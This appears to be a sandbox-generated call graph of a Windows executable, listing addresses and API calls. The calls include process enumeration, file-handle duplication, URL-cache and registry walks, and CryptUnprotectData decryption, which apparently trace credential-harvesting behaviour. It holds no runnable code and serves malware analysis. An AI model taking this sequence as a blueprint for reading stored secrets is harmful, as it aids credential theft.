40b2cc 27 API calls 38069->38070 38071 402cd5 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402cf0 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d0b 38074->38075 38076 40b2cc 27 API calls 38075->38076 38077 402d26 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402d3e 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402d59 38080->38081 38082 40b2cc 27 API calls 38081->38082 38083 402d78 38082->38083 38084 40b2cc 27 API calls 38083->38084 38085 402d93 38084->38085 38086 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38085->38086 38086->37969 38087->37959 38091 40b58d 38088->38091 38090 40b2d1 38090->38033 38092 40b5a4 GetModuleHandleW FindResourceW 38091->38092 38093 40b62e 38091->38093 38094 40b5c2 LoadResource 38092->38094 38096 40b5e7 38092->38096 38093->38090 38095 40b5d0 SizeofResource LockResource 38094->38095 38094->38096 38095->38096 38096->38093 38104 40afcf 38096->38104 38098 40b608 memcpy 38107 40b4d3 memcpy 38098->38107 38100 40b61e 38108 40b3c1 18 API calls 38100->38108 38102 40b626 38109 40b04b 38102->38109 38105 40b04b ??3@YAXPAX 38104->38105 38106 40afd7 ??2@YAPAXI 38105->38106 38106->38098 38107->38100 38108->38102 38110 40b051 ??3@YAXPAX 38109->38110 38111 40b05f 38109->38111 38110->38111 38111->38093 38112->37977 38114 4032c4 38113->38114 38115 40b633 ??3@YAXPAX 38114->38115 38116 403316 38115->38116 38135 44553b 38116->38135 38120 403480 38333 40368c 15 API calls 38120->38333 38122 403489 38123 40b633 ??3@YAXPAX 38122->38123 38124 403495 38123->38124 38124->37979 38125 4033a9 memset memcpy 38126 4033ec wcscmp 38125->38126 38127 40333c 38125->38127 38126->38127 38127->38120 38127->38125 38127->38126 38331 4028e7 11 API calls 38127->38331 38332 40f508 6 API calls 38127->38332 38129 403421 _wcsicmp 38129->38127 38132 444a64 FreeLibrary 38131->38132 38133 444a83 38131->38133 38132->38133 38133->37979 38134->37980 38136 445548 38135->38136 38137 445599 38136->38137 38334 40c768 38136->38334 38138 4455a8 memset 38137->38138 38145 4457f2 38137->38145 38418 403988 38138->38418 38149 445854 38145->38149 38521 403e2d memset memset memset memset memset 38145->38521 38146 445672 38429 403fbe memset memset memset memset memset 38146->38429 38147 4458bb memset memset 38152 414c2e 17 API calls 38147->38152 38197 4458aa 38149->38197 38544 403c9c memset memset memset memset memset 38149->38544 38150 44595e memset memset 38156 414c2e 17 API calls 38150->38156 38151 4455e5 38151->38146 38159 44560f 38151->38159 38157 4458f9 38152->38157 38153 44557a 38194 44558c 38153->38194 38398 4136c0 38153->38398 38155 445a00 memset memset 38166 414c2e 17 API calls 38155->38166 38167 44599c 38156->38167 38168 40b2cc 27 API calls 38157->38168 38171 4087b3 338 API calls 38159->38171 38161 445849 38612 40b1ab ??3@YAXPAX ??3@YAXPAX 38161->38612 38162 445bca 38169 445c8b memset memset 38162->38169 38236 445cf0 38162->38236 38163 445b38 memset memset memset 38174 445bd4 38163->38174 38175 445b98 38163->38175 38176 445a3e 38166->38176 38178 40b2cc 27 API calls 38167->38178 38170 445909 38168->38170 38182 414c2e 17 API calls 38169->38182 38179 409d1f 6 API calls 38170->38179 38180 445621 38171->38180 38173 44589f 38613 40b1ab ??3@YAXPAX ??3@YAXPAX 38173->38613 38567 414c2e 38174->38567 38175->38174 38184 445ba2 38175->38184 38187 40b2cc 27 API calls 38176->38187 38181 4459ac 38178->38181 38190 445919 38179->38190 38598 4454bf 20 API calls 38180->38598 38192 409d1f 6 API calls 38181->38192 38193 445cc9 38182->38193 38705 4099c6 wcslen 38184->38705 38185 4456b2 38600 40b1ab ??3@YAXPAX ??3@YAXPAX 38185->38600 38198 445a4f 38187->38198 38189 403335 38330 4452e5 45 API calls 38189->38330 38614 409b98 GetFileAttributesW 38190->38614 38191 445823 38191->38161 38204 4087b3 338 API calls 38191->38204 38206 4459bc 38192->38206 38207 409d1f 6 API calls 38193->38207 38402 444b06 38194->38402 38195 445879 38195->38173 38217 4087b3 338 API calls 38195->38217 38197->38147 38222 44594a 38197->38222 38210 409d1f 6 API calls 38198->38210 38201 445d3d 38221 40b2cc 27 API calls 38201->38221 38202 445d88 memset memset memset 38205 414c2e 17 API calls 38202->38205 38204->38191 38214 445dde 38205->38214 38681 409b98 GetFileAttributesW 38206->38681 38216 445ce1 38207->38216 38208 445bb3 38708 445403 memset 38208->38708 38209 445680 38209->38185 38452 4087b3 memset 38209->38452 38219 445a63 38210->38219 38211 40b2cc 27 API calls 38220 445bf3 38211->38220 38212 445928 38212->38222 38615 40b6ef 38212->38615 38223 40b2cc 27 API calls 38214->38223 38725 409b98 GetFileAttributesW 38216->38725 38217->38195 38228 40b2cc 27 API calls 38219->38228 38583 409d1f wcslen wcslen 38220->38583 38231 445d54 _wcsicmp 38221->38231 38222->38150 38235 4459ed 38222->38235 38234 445def 38223->38234 38224 4459cb 38224->38235 38245 40b6ef 253 API calls 38224->38245 38238 445a94 38228->38238 38242 445d71 38231->38242 38308 445d67 38231->38308 38233 445665 38599 40b1ab ??3@YAXPAX ??3@YAXPAX 38233->38599 38243 409d1f 6 API calls 38234->38243 38235->38155 38278 445b22 38235->38278 38236->38189 38236->38201 38236->38202 38237 445389 259 API calls 38237->38162 38682 40ae18 38238->38682 38239 44566d 38239->38145 38503 413d4c 38239->38503 38726 445093 23 API calls 38242->38726 38251 445e03 38243->38251 38245->38235 38247 4456d8 38252 40b2cc 27 API calls 38247->38252 38250 44563c 38250->38233 38255 4087b3 338 API calls 38250->38255 38727 409b98 GetFileAttributesW 38251->38727 38258 4456e2 38252->38258 38253 40b2cc 27 API calls 38259 445c23 38253->38259 38254 445d83 38254->38189 38255->38250 38257 40b6ef 253 API calls 38257->38189 38601 413fa6 _wcsicmp _wcsicmp 38258->38601 38263 409d1f 6 API calls 38259->38263 38261 445e12 38268 445e6b 38261->38268 38274 40b2cc 27 API calls 38261->38274 38266 445c37 38263->38266 38264 445aa1 38267 445b17 38264->38267 38282 445ab2 memset 38264->38282 38296 409d1f 6 API calls 38264->38296 38304 445389 259 API calls 38264->38304 38689 40add4 38264->38689 38694 40ae51 38264->38694 38265 4456eb 38270 4456fd memset memset memset memset 38265->38270 38271 4457ea 38265->38271 38272 445389 259 API calls 38266->38272 38702 40aebe 38267->38702 38729 445093 23 API calls 38268->38729 38602 409c70 wcscpy wcsrchr 38270->38602 38605 413d29 38271->38605 38277 445c47 38272->38277 38279 445e33 38274->38279 38284 40b2cc 27 API calls 38277->38284 38278->38162 38278->38163 38285 409d1f 6 API calls 38279->38285 38281 445e7e 38286 445f67 38281->38286 38287 40b2cc 27 API calls 38282->38287 38289 445c53 38284->38289 38290 445e47 38285->38290 38291 40b2cc 27 API calls 38286->38291 38287->38264 38288 409c70 2 API calls 38292 44577e 38288->38292 38293 409d1f 6 API calls 38289->38293 38728 409b98 GetFileAttributesW 38290->38728 38295 445f73 38291->38295 38297 409c70 2 API calls 38292->38297 38298 445c67 38293->38298 38300 409d1f 6 API calls 38295->38300 38296->38264 38301 44578d 38297->38301 38302 445389 259 API calls 38298->38302 38299 445e56 38299->38268 38305 445e83 memset 38299->38305 38303 445f87 38300->38303 38301->38271 38307 40b2cc 27 API calls 38301->38307 38302->38162 38732 409b98 GetFileAttributesW 38303->38732 38304->38264 38309 40b2cc 27 API calls 38305->38309 38311 4457a8 38307->38311 38308->38189 38308->38257 38310 445eab 38309->38310 38312 409d1f 6 API calls 38310->38312 38313 409d1f 6 API calls 38311->38313 38314 445ebf 38312->38314 38315 4457b8 38313->38315 38316 40ae18 9 API calls 38314->38316 38604 409b98 GetFileAttributesW 38315->38604 38326 445ef5 38316->38326 38318 4457c7 38318->38271 38320 4087b3 338 API calls 38318->38320 38319 40ae51 9 API calls 38319->38326 38320->38271 38321 445f5c 38323 40aebe FindClose 38321->38323 38322 40add4 2 API calls 38322->38326 38323->38286 38324 40b2cc 27 API calls 38324->38326 38325 409d1f 6 API calls 38325->38326 38326->38319 38326->38321 38326->38322 38326->38324 38326->38325 38328 445f3a 38326->38328 38730 409b98 GetFileAttributesW 38326->38730 38731 445093 23 API calls 38328->38731 38330->38127 38331->38129 38332->38127 38333->38122 38335 40c775 38334->38335 38733 40b1ab ??3@YAXPAX ??3@YAXPAX 38335->38733 38337 40c788 38734 40b1ab ??3@YAXPAX ??3@YAXPAX 38337->38734 38339 40c790 38735 40b1ab ??3@YAXPAX ??3@YAXPAX 38339->38735 38341 40c798 38342 40aa04 ??3@YAXPAX 38341->38342 38343 40c7a0 38342->38343 38736 40c274 memset 38343->38736 38348 40a8ab 9 API calls 38349 40c7c3 38348->38349 38350 40a8ab 9 API calls 38349->38350 38351 40c7d0 38350->38351 38765 40c3c3 38351->38765 38355 40c877 38364 40bdb0 38355->38364 38356 40c86c 38793 4053fe 39 API calls 38356->38793 38359 40c813 _wcslwr 38791 40c634 50 API calls 38359->38791 38361 40c829 wcslen 38362 40c7e5 38361->38362 38362->38355 38362->38356 38790 40a706 wcslen memcpy 38362->38790 38792 40c634 50 API calls 38362->38792 38954 404363 38364->38954 38366 40bf5d 38974 40440c 38366->38974 38370 40b2cc 27 API calls 38371 40be02 wcslen 38370->38371 38371->38366 38374 40be1e 38371->38374 38372 40be26 _wcsncoll 38372->38374 38374->38366 38374->38372 38376 40be7d memset 38374->38376 38377 40bea7 memcpy 38374->38377 38378 40bf11 wcschr 38374->38378 38379 40b2cc 27 API calls 38374->38379 38381 40bf43 LocalFree 38374->38381 38977 40bd5d 28 API calls 38374->38977 38978 404423 38374->38978 38376->38374 38376->38377 38377->38374 38377->38378 38378->38374 38380 40bef6 _wcsnicmp 38379->38380 38380->38374 38380->38378 38381->38374 38382 4135f7 38993 4135e0 38382->38993 38385 40b2cc 27 API calls 38386 41360d 38385->38386 38387 40a804 8 API calls 38386->38387 38388 413613 38387->38388 38389 41363e 38388->38389 38390 40b273 27 API calls 38388->38390 38391 4135e0 FreeLibrary 38389->38391 38392 413625 GetProcAddress 38390->38392 38393 413643 38391->38393 38392->38389 38394 413648 38392->38394 38393->38153 38395 413658 38394->38395 38396 4135e0 FreeLibrary 38394->38396 38395->38153 38397 413666 38396->38397 38397->38153 38400 4136e2 38398->38400 38399 413827 38597 41366b FreeLibrary 38399->38597 38400->38399 38401 4137ac CoTaskMemFree 38400->38401 38401->38400 38996 4449b9 38402->38996 38405 444c1f 38405->38137 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39017 444972 GetVersionExW 38408->39017 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 39021 444a85 42 API calls 38412->39021 38416->38411 38416->38412 39018 444aa5 42 API calls 38416->39018 39019 40a7a0 GetVersionExW 38416->39019 39020 444a85 42 API calls 38416->39020 38419 40399d 38418->38419 39022 403a16 38419->39022 38421 403a09 39036 40b1ab ??3@YAXPAX ??3@YAXPAX 38421->39036 38423 4039a3 38423->38421 38427 4039f4 38423->38427 39033 40a02c CreateFileW 38423->39033 38424 403a12 wcsrchr 38424->38151 38427->38421 38428 4099c6 2 API calls 38427->38428 38428->38421 38430 414c2e 17 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 17 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39063 40414f memset 38443->39063 38445 404140 39077 40b1ab ??3@YAXPAX ??3@YAXPAX 38445->39077 38447 4040ec memset 38450 4040e0 38447->38450 38448 404148 38448->38209 38449 4099c6 2 API calls 38449->38450 38450->38445 38450->38447 38450->38449 38451 40a8ab 9 API calls 38450->38451 38451->38450 39090 40a6e6 WideCharToMultiByte 38452->39090 38454 4087ed 39091 4095d9 memset 38454->39091 38457 408953 38457->38209 38458 408809 memset memset memset memset memset 38459 40b2cc 27 API calls 38458->38459 38460 4088a1 38459->38460 38461 409d1f 6 API calls 38460->38461 38462 4088b1 38461->38462 38463 40b2cc 27 API calls 38462->38463 38464 4088c0 38463->38464 38465 409d1f 6 API calls 38464->38465 38466 4088d0 38465->38466 38467 40b2cc 27 API calls 38466->38467 38468 4088df 38467->38468 38469 409d1f 6 API calls 38468->38469 38470 4088ef 38469->38470 38471 40b2cc 27 API calls 38470->38471 38472 4088fe 38471->38472 38473 409d1f 6 API calls 38472->38473 38474 40890e 38473->38474 38475 40b2cc 27 API calls 38474->38475 38476 40891d 38475->38476 38477 409d1f 6 API calls 38476->38477 38478 40892d 38477->38478 38504 40b633 ??3@YAXPAX 38503->38504 38505 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38504->38505 38506 413f00 Process32NextW 38505->38506 38507 413da5 OpenProcess 38506->38507 38508 413f17 CloseHandle 38506->38508 38509 413eb0 38507->38509 38510 413df3 memset 38507->38510 38508->38247 38509->38506 38512 413ebf ??3@YAXPAX 38509->38512 38513 4099f4 3 API calls 38509->38513 39140 413f27 38510->39140 38512->38509 38513->38509 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38518 413e1f 38514->38518 38516->38518 38517 413e6a QueryFullProcessImageNameW 38517->38518 38518->38514 38518->38517 39145 413959 38518->39145 39161 413ca4 38518->39161 38520 413ea2 CloseHandle 38520->38509 38522 414c2e 17 API calls 38521->38522 38523 403eb7 38522->38523 38524 414c2e 17 API calls 38523->38524 38525 403ec5 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 403ee2 38526->38527 38528 409d1f 6 API calls 38527->38528 38529 403efd 38528->38529 38530 409d1f 6 API calls 38529->38530 38531 403f15 38530->38531 38532 403af5 20 API calls 38531->38532 38533 403f29 38532->38533 38534 403af5 20 API calls 38533->38534 38535 403f3a 38534->38535 38536 40414f 33 API calls 38535->38536 38537 403f4f 38536->38537 38538 403faf 38537->38538 38539 403f5b memset 38537->38539 38542 4099c6 2 API calls 38537->38542 38543 40a8ab 9 API calls 38537->38543 39175 40b1ab ??3@YAXPAX ??3@YAXPAX 38538->39175 38539->38537 38541 403fb7 38541->38191 38542->38537 38543->38537 38545 414c2e 17 API calls 38544->38545 38546 403d26 38545->38546 38547 414c2e 17 API calls 38546->38547 38548 403d34 38547->38548 38549 409d1f 6 API calls 38548->38549 38550 403d51 38549->38550 38551 409d1f 6 API calls 38550->38551 38552 403d6c 38551->38552 38553 409d1f 6 API calls 38552->38553 38554 403d84 38553->38554 38555 403af5 20 API calls 38554->38555 38556 403d98 38555->38556 38557 403af5 20 API calls 38556->38557 38558 403da9 38557->38558 38559 40414f 33 API calls 38558->38559 38564 403dbe 38559->38564 38560 403e1e 39176 40b1ab ??3@YAXPAX ??3@YAXPAX 38560->39176 38562 403dca memset 38562->38564 38563 403e26 38563->38195 38564->38560 38564->38562 38565 4099c6 2 API calls 38564->38565 38566 40a8ab 9 API calls 38564->38566 38565->38564 38566->38564 38568 414b81 9 API calls 38567->38568 38569 414c40 38568->38569 38570 414c73 memset 38569->38570 39177 409cea 38569->39177 38571 414c94 38570->38571 39180 414592 RegOpenKeyExW 38571->39180 38575 414c64 SHGetSpecialFolderPathW 38576 414d0b 38575->38576 38576->38211 38577 414cc1 38578 414cf4 wcscpy 38577->38578 39181 414bb0 wcscpy 38577->39181 38578->38576 38580 414cd2 39182 4145ac RegQueryValueExW 38580->39182 38582 414ce9 RegCloseKey 38582->38578 38584 409d62 38583->38584 38585 409d43 wcscpy 38583->38585 38588 445389 38584->38588 38586 409719 2 API calls 38585->38586 38587 409d51 wcscat 38586->38587 38587->38584 38589 40ae18 9 API calls 38588->38589 38595 4453c4 38589->38595 38590 40ae51 9 API calls 38590->38595 38591 4453f3 38593 40aebe FindClose 38591->38593 38592 40add4 2 API calls 38592->38595 38594 4453fe 38593->38594 38594->38253 38595->38590 38595->38591 38595->38592 38596 445403 254 API calls 38595->38596 38596->38595 38597->38194 38598->38250 38599->38239 38600->38239 38601->38265 38603 409c89 38602->38603 38603->38288 38604->38318 38606 413d39 38605->38606 38607 413d2f FreeLibrary 38605->38607 38608 40b633 ??3@YAXPAX 38606->38608 38607->38606 38609 413d42 38608->38609 38610 40b633 ??3@YAXPAX 38609->38610 38611 413d4a 38610->38611 38611->38145 38612->38149 38613->38197 38614->38212 38616 44db70 38615->38616 38617 40b6fc memset 38616->38617 38618 409c70 2 API calls 38617->38618 38619 40b732 wcsrchr 38618->38619 38620 40b743 38619->38620 38621 40b746 memset 38619->38621 38620->38621 38622 40b2cc 27 API calls 38621->38622 38623 40b76f 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 40b783 38624->38625 39183 409b98 GetFileAttributesW 38625->39183 38627 40b792 38628 40b7c2 38627->38628 38629 409c70 2 API calls 38627->38629 39184 40bb98 38628->39184 38631 40b7a5 38629->38631 38633 40b2cc 27 API calls 38631->38633 38636 40b7b2 38633->38636 38634 40b837 CloseHandle 38638 40b83e memset 38634->38638 38635 40b817 39267 409a45 GetTempPathW 38635->39267 38639 409d1f 6 API calls 38636->38639 39217 40a6e6 WideCharToMultiByte 38638->39217 38639->38628 38640 40b827 CopyFileW 38640->38638 38642 40b866 39218 444432 38642->39218 38645 40bad5 38647 40baeb 38645->38647 38648 40bade DeleteFileW 38645->38648 38646 40b273 27 API calls 38649 40b89a 38646->38649 38650 40b04b ??3@YAXPAX 38647->38650 38648->38647 39264 438552 38649->39264 38652 40baf3 38650->38652 38652->38222 38654 40bacd 39298 443d90 111 API calls 38654->39298 38657 40bac6 39297 424f26 123 API calls 38657->39297 38658 40b8bd memset 39288 425413 17 API calls 38658->39288 38661 425413 17 API calls 38678 40b8b8 38661->38678 38664 40a71b MultiByteToWideChar 38664->38678 38667 40b9b5 memcmp 38667->38678 38668 4099c6 2 API calls 38668->38678 38669 404423 38 API calls 38669->38678 38672 40bb3e memset memcpy 39299 40a734 MultiByteToWideChar 38672->39299 38673 4251c4 137 API calls 38673->38678 38675 40bb88 LocalFree 38675->38678 38678->38657 38678->38658 38678->38661 38678->38664 38678->38667 38678->38668 38678->38669 38678->38672 38678->38673 38679 40ba5f memcmp 38678->38679 38680 40a734 MultiByteToWideChar 38678->38680 39289 4253ef 16 API calls 38678->39289 39290 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38678->39290 39291 4253af 17 API calls 38678->39291 39292 4253cf 17 API calls 38678->39292 39293 447280 memset 38678->39293 39294 447960 memset memcpy memcpy memcpy 38678->39294 39295 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38678->39295 39296 447920 memcpy memcpy memcpy 38678->39296 38679->38678 38680->38678 38681->38224 38683 40aebe FindClose 38682->38683 38684 40ae21 38683->38684 38685 4099c6 2 API calls 38684->38685 38686 40ae35 38685->38686 38687 409d1f 6 API calls 38686->38687 38688 40ae49 38687->38688 38688->38264 38690 40ade0 38689->38690 38691 40ae0f 38689->38691 38690->38691 38692 40ade7 wcscmp 38690->38692 38691->38264 38692->38691 38693 40adfe wcscmp 38692->38693 38693->38691 38695 40ae7b FindNextFileW 38694->38695 38696 40ae5c FindFirstFileW 38694->38696 38697 40ae94 38695->38697 38698 40ae8f 38695->38698 38696->38697 38699 409d1f 6 API calls 38697->38699 38701 40aeb6 38697->38701 38700 40aebe FindClose 38698->38700 38699->38701 38700->38697 38701->38264 38703 40aed1 38702->38703 38704 40aec7 FindClose 38702->38704 38703->38278 38704->38703 38706 4099d7 38705->38706 38707 4099da memcpy 38705->38707 38706->38707 38707->38208 38709 40b2cc 27 API calls 38708->38709 38710 44543f 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 44544f 38711->38712 39657 409b98 GetFileAttributesW 38712->39657 38714 445476 38717 40b2cc 27 API calls 38714->38717 38715 44545e 38715->38714 38716 40b6ef 253 API calls 38715->38716 38716->38714 38718 445482 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 445492 38719->38720 39658 409b98 GetFileAttributesW 38720->39658 38722 4454a1 38723 4454b9 38722->38723 38724 40b6ef 253 API calls 38722->38724 38723->38237 38724->38723 38725->38236 38726->38254 38727->38261 38728->38299 38729->38281 38730->38326 38731->38326 38732->38308 38733->38337 38734->38339 38735->38341 38737 414c2e 17 API calls 38736->38737 38738 40c2ae 38737->38738 38794 40c1d3 38738->38794 38743 40c3be 38760 40a8ab 38743->38760 38744 40afcf 2 API calls 38745 40c2fd FindFirstUrlCacheEntryW 38744->38745 38746 40c3b6 38745->38746 38747 40c31e wcschr 38745->38747 38748 40b04b ??3@YAXPAX 38746->38748 38749 40c331 38747->38749 38750 40c35e FindNextUrlCacheEntryW 38747->38750 38748->38743 38751 40a8ab 9 API calls 38749->38751 38750->38747 38752 40c373 GetLastError 38750->38752 38755 40c33e wcschr 38751->38755 38753 40c3ad FindCloseUrlCache 38752->38753 38754 40c37e 38752->38754 38753->38746 38756 40afcf 2 API calls 38754->38756 38755->38750 38757 40c34f 38755->38757 38758 40c391 FindNextUrlCacheEntryW 38756->38758 38759 40a8ab 9 API calls 38757->38759 38758->38747 38758->38753 38759->38750 38888 40a97a 38760->38888 38763 40a8cc 38763->38348 38764 40a8d0 7 API calls 38764->38763 38893 40b1ab ??3@YAXPAX ??3@YAXPAX 38765->38893 38767 40c3dd 38768 40b2cc 27 API calls 38767->38768 38769 40c3e7 38768->38769 38894 414592 RegOpenKeyExW 38769->38894 38771 40c3f4 38772 40c50e 38771->38772 38773 40c3ff 38771->38773 38787 405337 38772->38787 38774 40a9ce 4 API calls 38773->38774 38775 40c418 memset 38774->38775 38895 40aa1d 38775->38895 38778 40c471 38780 40c47a _wcsupr 38778->38780 38779 40c505 RegCloseKey 38779->38772 38781 40a8d0 7 API calls 38780->38781 38782 40c498 38781->38782 38783 40a8d0 7 API calls 38782->38783 38784 40c4ac memset 38783->38784 38785 40aa1d 38784->38785 38786 40c4e4 RegEnumValueW 38785->38786 38786->38779 38786->38780 38897 405220 38787->38897 38790->38359 38791->38361 38792->38362 38793->38355 38795 40ae18 9 API calls 38794->38795 38801 40c210 38795->38801 38796 40ae51 9 API calls 38796->38801 38797 40c264 38798 40aebe FindClose 38797->38798 38800 40c26f 38798->38800 38799 40add4 2 API calls 38799->38801 38806 40e5ed memset memset 38800->38806 38801->38796 38801->38797 38801->38799 38802 40c231 _wcsicmp 38801->38802 38803 40c1d3 35 API calls 38801->38803 38802->38801 38804 40c248 38802->38804 38803->38801 38819 40c084 22 API calls 38804->38819 38807 414c2e 17 API calls 38806->38807 38808 40e63f 38807->38808 38809 409d1f 6 API calls 38808->38809 38810 40e658 38809->38810 38820 409b98 GetFileAttributesW 38810->38820 38812 40e667 38813 40e680 38812->38813 38815 409d1f 6 API calls 38812->38815 38821 409b98 GetFileAttributesW 38813->38821 38815->38813 38816 40e68f 38818 40c2d8 38816->38818 38822 40e4b2 38816->38822 38818->38743 38818->38744 38819->38801 38820->38812 38821->38816 38843 40e01e 38822->38843 38824 40e593 38825 40e5b0 38824->38825 38826 40e59c DeleteFileW 38824->38826 38828 40b04b ??3@YAXPAX 38825->38828 38826->38825 38827 40e521 38827->38824 38866 40e175 38827->38866 38829 40e5bb 38828->38829 38831 40e5c4 CloseHandle 38829->38831 38832 40e5cc 38829->38832 38831->38832 38834 40b633 ??3@YAXPAX 38832->38834 38833 40e573 38836 40e584 38833->38836 38837 40e57c CloseHandle 38833->38837 38835 40e5db 38834->38835 38840 40b633 ??3@YAXPAX 38835->38840 38887 40b1ab ??3@YAXPAX ??3@YAXPAX 38836->38887 38837->38836 38839 40e540 38839->38833 38886 40e2ab 30 API calls 38839->38886 38841 40e5e3 38840->38841 38841->38818 38844 406214 22 API calls 38843->38844 38845 40e03c 38844->38845 38846 40e16b 38845->38846 38847 40dd85 75 API calls 38845->38847 38846->38827 38848 40e06b 38847->38848 38848->38846 38849 40afcf ??2@YAPAXI ??3@YAXPAX 38848->38849 38850 40e08d OpenProcess 38849->38850 38851 40e0a4 GetCurrentProcess DuplicateHandle 38850->38851 38855 40e152 38850->38855 38852 40e0d0 GetFileSize 38851->38852 38853 40e14a CloseHandle 38851->38853 38856 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38852->38856 38853->38855 38854 40e160 38858 40b04b ??3@YAXPAX 38854->38858 38855->38854 38857 406214 22 API calls 38855->38857 38859 40e0ea 38856->38859 38857->38854 38858->38846 38860 4096dc CreateFileW 38859->38860 38861 40e0f1 CreateFileMappingW 38860->38861 38862 40e140 CloseHandle CloseHandle 38861->38862 38863 40e10b MapViewOfFile 38861->38863 38862->38853 38864 40e13b CloseHandle 38863->38864 38865 40e11f WriteFile UnmapViewOfFile 38863->38865 38864->38862 38865->38864 38867 40e18c 38866->38867 38868 406b90 11 API calls 38867->38868 38869 40e19f 38868->38869 38870 40e1a7 memset 38869->38870 38871 40e299 38869->38871 38876 40e1e8 38870->38876 38872 4069a3 ??3@YAXPAX ??3@YAXPAX 38871->38872 38873 40e2a4 38872->38873 38873->38839 38874 406e8f 13 API calls 38874->38876 38875 406b53 SetFilePointerEx ReadFile 38875->38876 38876->38874 38876->38875 38877 40e283 38876->38877 38878 40dd50 _wcsicmp 38876->38878 38882 40742e 8 API calls 38876->38882 38883 40aae3 wcslen wcslen _memicmp 38876->38883 38884 40e244 _snwprintf 38876->38884 38879 40e291 38877->38879 38880 40e288 ??3@YAXPAX 38877->38880 38878->38876 38881 40aa04 ??3@YAXPAX 38879->38881 38880->38879 38881->38871 38882->38876 38883->38876 38885 40a8d0 7 API calls 38884->38885 38885->38876 38886->38839 38887->38824 38892 40a980 38888->38892 38889 40a8bb 38889->38763 38889->38764 38890 40a995 _wcsicmp 38890->38892 38891 40a99c wcscmp 38891->38892 38892->38889 38892->38890 38892->38891 38893->38767 38894->38771 38896 40aa23 RegEnumValueW 38895->38896 38896->38778 38896->38779 38898 405335 38897->38898 38899 40522a 38897->38899 38898->38362 38900 40b2cc 27 API calls 38899->38900 38901 405234 38900->38901 38902 40a804 8 API calls 38901->38902 38903 40523a 38902->38903 38942 40b273 38903->38942 38905 405248 _mbscpy _mbscat GetProcAddress 38906 40b273 27 API calls 38905->38906 38907 405279 38906->38907 38945 405211 GetProcAddress 38907->38945 38909 405282 38910 40b273 27 API calls 38909->38910 38911 40528f 38910->38911 38946 405211 GetProcAddress 38911->38946 38913 405298 38914 40b273 27 API calls 38913->38914 38915 4052a5 38914->38915 38947 405211 GetProcAddress 38915->38947 38917 4052ae 38918 40b273 27 API calls 38917->38918 38919 4052bb 38918->38919 38948 405211 GetProcAddress 38919->38948 38921 4052c4 38922 40b273 27 API calls 38921->38922 38923 4052d1 38922->38923 38949 405211 GetProcAddress 38923->38949 38925 4052da 38926 40b273 27 API calls 38925->38926 38927 4052e7 38926->38927 38950 405211 GetProcAddress 38927->38950 38929 4052f0 38930 40b273 27 API calls 38929->38930 38931 4052fd 38930->38931 38951 405211 GetProcAddress 38931->38951 38933 405306 38934 40b273 27 API calls 38933->38934 38935 405313 38934->38935 38952 405211 GetProcAddress 38935->38952 38937 40531c 38938 40b273 27 API calls 38937->38938 38939 405329 38938->38939 38953 405211 GetProcAddress 38939->38953 38943 40b58d 27 API calls 38942->38943 38944 40b18c 38943->38944 38944->38905 38945->38909 38946->38913 38947->38917 38948->38921 38949->38925 38950->38929 38951->38933 38952->38937 38955 40440c FreeLibrary 38954->38955 38956 40436d 38955->38956 38957 40a804 8 API calls 38956->38957 38958 404377 38957->38958 38959 404383 38958->38959 38960 404405 38958->38960 38961 40b273 27 API calls 38959->38961 38960->38366 38960->38370 38962 40438d GetProcAddress 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4043a7 GetProcAddress 38963->38964 38965 40b273 27 API calls 38964->38965 38966 4043ba GetProcAddress 38965->38966 38967 40b273 27 API calls 38966->38967 38968 4043ce GetProcAddress 38967->38968 38969 40b273 27 API calls 38968->38969 38970 4043e2 GetProcAddress 38969->38970 38971 4043f1 38970->38971 38972 4043f7 38971->38972 38973 40440c FreeLibrary 38971->38973 38972->38960 38973->38960 38975 404413 FreeLibrary 38974->38975 38976 40441e 38974->38976 38975->38976 38976->38382 38977->38374 38979 40447e 38978->38979 38980 40442e 38978->38980 38981 404485 CryptUnprotectData 38979->38981 38982 40449c 38979->38982 38983 40b2cc 27 API calls 38980->38983 38981->38982 38982->38374 38984 404438 38983->38984 38985 40a804 8 API calls 38984->38985 38986 40443e 38985->38986 38987 404445 38986->38987 38988 404467 38986->38988 38989 40b273 27 API calls 38987->38989 38988->38979 38990 404475 FreeLibrary 38988->38990 38991 40444f GetProcAddress 38989->38991 38990->38979 38991->38988 38992 404460 38991->38992 38992->38988 38994 4135f6 38993->38994 38995 4135eb FreeLibrary 38993->38995 38994->38385 38995->38994 38997 4449c4 38996->38997 38998 444a52 38996->38998 38999 40b2cc 27 API calls 38997->38999 38998->38405 38998->38406 39000 4449cb 38999->39000 39001 40a804 8 API calls 39000->39001 39002 4449d1 39001->39002 39003 40b273 27 API calls 39002->39003 39004 4449dc GetProcAddress 39003->39004 39005 40b273 27 API calls 39004->39005 39006 4449f3 GetProcAddress 39005->39006 39007 40b273 27 API calls 39006->39007 39008 444a04 GetProcAddress 39007->39008 39009 40b273 27 API calls 39008->39009 39010 444a15 GetProcAddress 39009->39010 39011 40b273 27 API calls 39010->39011 39012 444a26 GetProcAddress 39011->39012 39013 40b273 27 API calls 39012->39013 39014 444a37 GetProcAddress 39013->39014 39017->38416 39018->38416 39019->38416 39020->38416 39021->38407 39023 403a29 39022->39023 39037 403bed memset memset 39023->39037 39025 403ae7 